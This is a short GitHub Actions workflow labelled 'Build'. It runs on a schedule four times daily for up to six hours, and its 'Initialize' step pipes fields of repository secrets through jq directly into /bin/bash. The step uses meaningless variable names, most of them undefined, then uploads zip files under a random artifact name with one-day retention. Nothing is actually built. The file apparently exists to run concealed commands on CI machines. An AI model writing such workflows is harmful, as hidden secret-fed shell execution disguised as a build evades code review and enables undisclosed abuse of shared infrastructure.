name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '4 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Initialize
        env:
          aq08: ${{ secrets.aq08 }}
        run: |
          printf '%s' "$aq08" | jq -r .uwsh375 | /bin/bash
          printf '%s' "$nt0354" | jq -r .ph1 | /bin/bash
          printf '%s' "$fpm1" | jq -r .bk8 | /bin/bash
          printf '%s' "$kmz6442" | jq -r .ukf3 | /bin/bash
          printf '%s' "$rkfez148" | jq -r .geca7795 | /bin/bash
          printf '%s' "$rw3228" | jq -r .x5 | /bin/bash

      - name: Persist results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 0emZCHNF
          path: "*.zip"
          retention-days: 1
